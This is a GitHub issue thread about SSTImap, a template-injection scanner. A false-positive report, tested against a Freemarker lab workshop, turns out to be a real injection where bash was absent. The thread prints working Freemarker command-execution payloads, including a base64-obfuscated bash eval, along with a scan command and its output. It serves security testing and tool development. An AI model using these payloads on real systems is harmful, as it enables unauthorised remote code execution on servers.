vladko312 / SSTImap

Automatic SSTI detection tool with interactive interface
GNU General Public License v3.0

SSTImap should test a simple payload, otherwise it may return a false positive result #30

Open alasalamont opened 8 months ago

alasalamont commented 8 months ago

Hi brother, I tested SSTImap on this workshop, at 25_template_freemarker

https://gosecure.github.io/template-injection-workshop/

When I use a simple payload, it works

```
<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("id")}
```

But when the tool uses its payload, it does not work

```
${7670795914?c}<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("bash -c {eval,$({tr,/+,_-}<<<ZWNobyBhMA==|{base64,--decode})}") }${7841412055?c}
```

The site returns

```
Template blocked: Cannot run program "bash": error=2, No such file or directory ---- FTL stack trace ("~" means nesting-related): - Failed at: ${ex("bash -c {eval,$({tr,/+,_-}\l\l\... [in template "tpl" at line 1, column 72] ----
```

Because of this, the tool also returns a false positive result

```
┌──(root㉿kali)-[/home/kali/Desktop/SSTImap]
└─# python3 sstimap.py -u "http://localhost:8025/admin/edit_page/1" -d "_csrf=ddcf50d0-b5a0-43f5-95dd-351495abc31b&title=Welcome+Page&templateCode=*&action=test" -C "JSESSIONID=182F5156C0D7E1B0A0E72D87D3D4F845" --proxy http://localhost:8080 -l 5 -e Freemarker

[*] Version: 1.1.4
[*] Author: @vladko312
[*] Based on Tplmap
[!] LEGAL DISCLAIMER: Usage of SSTImap for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] Loaded plugins by categories: languages: 5; legacy_engines: 1; engines: 16

[*] Scanning url: http://localhost:8025/admin/edit_page/1
[*] Testing if POST parameter 'templateCode' is injectable
[*] Freemarker plugin is testing rendering with tag '*'
[+] Freemarker plugin has confirmed injection with tag '*'
[+] SSTImap identified the following injection point:

  POST parameter: templateCode
  Engine: Freemarker
  Injection: *
  Context: text
  OS: undetected
  Technique: render
  Capabilities:

    Shell command execution: no
    Bind and reverse shell: no
    File write: no
    File read: no
    Code evaluation: no

[+] Rerun SSTImap providing one of the following options:
    --tpl-shell                  Prompt for an interactive shell on the template engine.
    --tpl-cmd                    Inject code in the template engine.
```

mrdragonblack commented 8 months ago

Same problem, but the problem is that the web does not use a template engine, or maybe it is just a junk HTTP packet. Maybe an error from the web like a 5xx, or a WAF, can cause a false positive, or the target web is not vulnerable to SSTI, just junk HTTP.

vladko312 commented 8 months ago

@alasalamont Why is your case a false positive? SSTImap correctly identified the template injection as rendered Freemarker using another payload. It was unable to run OS commands, as it tried using bash, but you still can inject template code to try different payloads. This works as intended, as bypassing a WAF is hard to automate.

I will work on improving the payload system though, as bash is not always present on the target.
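To make concrete why the run quoted above is not a false positive, here is an added Python illustration (not SSTImap's code): it keeps "the engine rendered my markers" apart from "the expression between the markers produced output", and treats a Freemarker error page as evidence that the input was interpreted as a template even though no command ran. The marker numbers and the `ex("id")` expression come from the payloads quoted in this issue; the sample responses, the `classify`/`summarize` names and the error-string hints are constructed assumptions.

```python
"""Read a template-engine response the way the result in this issue has to be
read: 'injected' (engine evaluated the input) is a separate finding from
'exec' (the expression between the markers produced output).
Added illustration for this thread, not SSTImap's own code. Every sample
response below is constructed, modelled on the output quoted in the issue."""
import re

# Marker numbers taken from the payload quoted in the issue. Freemarker renders
# ${7670795914?c} as the plain string "7670795914" (?c = "computer" number
# format, no grouping separators), so both strings in the response prove that
# the engine evaluated the template.
LEFT, RIGHT = 7670795914, 7841412055
# Expression placed between the markers (the issue's own simple payload).
INNER = '${ ex("id") }'
PAYLOAD = f"${{{LEFT}?c}}{INNER}${{{RIGHT}?c}}"

# Strings found in Freemarker's own error output ("FTL stack trace") and in the
# workshop's block message quoted in the issue (assumed hints, not exhaustive).
ENGINE_ERROR_HINTS = ("FTL stack trace", "Template blocked")

# Constructed sample responses (assumptions, not captures from the workshop).
SAMPLES = {
    "reflected": f"<p>Template: {PAYLOAD}</p>",                       # input echoed verbatim
    "rendered_exec": f"<p>Template: {LEFT}uid=1000(app){RIGHT}</p>",  # markers + output
    "rendered_empty": f"<p>Template: {LEFT}{RIGHT}</p>",              # markers, nothing between
    "blocked": ('Template blocked: Cannot run program "bash": error=2, '
                'No such file or directory ---- FTL stack trace ("~" means '
                'nesting-related): - Failed at: ${ex(...)} [in template "tpl" '
                'at line 1, column 72] ----'),
    "none": "<p>Page saved.</p>",                                      # no trace of the payload
}


def classify(response: str, left: int = LEFT, right: int = RIGHT,
             payload: str = PAYLOAD) -> dict:
    """Return the two findings a scanner must keep apart, plus a state label.

    injected: the engine treated the input as template code (rendered markers
              or an engine error page).
    exec:     the expression between the markers produced output.
    """
    if payload in response:
        # The exact payload came back untouched: not interpreted as a template.
        return {"injected": False, "exec": False, "state": "reflected", "output": None}
    m = re.search(re.escape(str(left)) + r"(.*?)" + re.escape(str(right)), response, re.S)
    if m:
        out = m.group(1).strip()
        return {"injected": True, "exec": bool(out), "state": "rendered", "output": out or None}
    if any(hint in response for hint in ENGINE_ERROR_HINTS):
        # Engine parsed and evaluated the template but the expression failed
        # (in the issue: no bash on the host). Injection is real; execution is not.
        return {"injected": True, "exec": False, "state": "engine_error", "output": None}
    return {"injected": False, "exec": False, "state": "not_rendered", "output": None}


def summarize(samples: dict = SAMPLES) -> dict:
    """Map each sample name to an (injection confirmed, command execution) pair,
    mirroring the 'Injection' / 'Shell command execution' lines in the scan output."""
    return {name: (r["injected"], r["exec"])
            for name, r in ((n, classify(s)) for n, s in samples.items())}


if __name__ == "__main__":
    for name, (injected, execd) in summarize().items():
        print(f"{name:15} injection={'yes' if injected else 'no':3} "
              f"command execution={'yes' if execd else 'no'}")
```

The "blocked" sample is the case from this issue: it classifies as injection confirmed with command execution absent, which is exactly what the scan output above reports under Capabilities.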

vladko312 commented 8 months ago

@mrdragonblack the problem you described is most likely caused by blind detection with small delay. Increase the delay or disable blind detection

alasalamont commented 8 months ago

> @alasalamont Why is your case a false positive? SSTImap correctly identified the template injection as rendered Freemarker using another payload. It was unable to run OS commands, as it tried using bash, but you still can inject template code to try different payloads. This works as intended, as bypassing a WAF is hard to automate.
>
> I will work on improving the payload system though, as bash is not always present on the target.

Yup, you are correct. I suggest adding some more payloads to test, to double-check. Like in this case, the system has no bash ^^

vladko312 commented 8 months ago

> I suggest adding some more payloads to test, to double-check. Like in this case, the system has no bash

I will do something about that, making more payload variations once the language is detected.

vladko312 commented 8 months ago

Blind false positives should be fixed in 1.2.0 @mrdragonblack, can you verify?

As for payloads with bash, this will come in later versions.